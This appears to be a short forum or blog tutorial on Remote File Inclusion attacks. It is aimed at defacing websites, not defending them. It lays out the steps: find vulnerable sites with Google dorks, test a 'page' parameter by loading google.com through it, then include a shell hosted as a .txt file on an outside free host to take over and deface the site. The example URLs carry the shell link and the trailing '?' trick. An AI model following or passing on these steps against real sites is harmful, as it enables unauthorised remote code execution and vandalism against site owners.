Hello Guys !
today I'm going to show you how RFI process goes Step By Step
#Searching for Vuln. Sites
#Checking if they are Vuln.
#Defacing them
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Searching for Vuln. sites:
We can find Vuln.websites by using Google DorkS
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Checking if they are Vuln. :
Now after we searched for sites on google, many sites will show but not all of them are Vuln.
so how can we check?
after opening the site check the link, for example it will be like:
http://www.tagert.com/index.php?page=ANYTHING
now to check the site we should replace "ANYTHING" with "http://www.google.com"
so it will be like :
http://www.tagert.com/index.php?page=htt...google.com
IF google home page showed up then the website is Vuln. for RFI,
IF not then fine another one
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#]Defacing:
OK, now if we found a Vuln. website how to deface? o_O
well now open any website on any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAPMLE it will be:
http://www.yourfreehost.com/shell.txt
http://www.tagert.com/index.php?page=htt...shell.txt?
[!]NOTE:- DO NOT FORGET THE '?' in the end of the URL
Now your shell will show so Deface the site
Post a Comment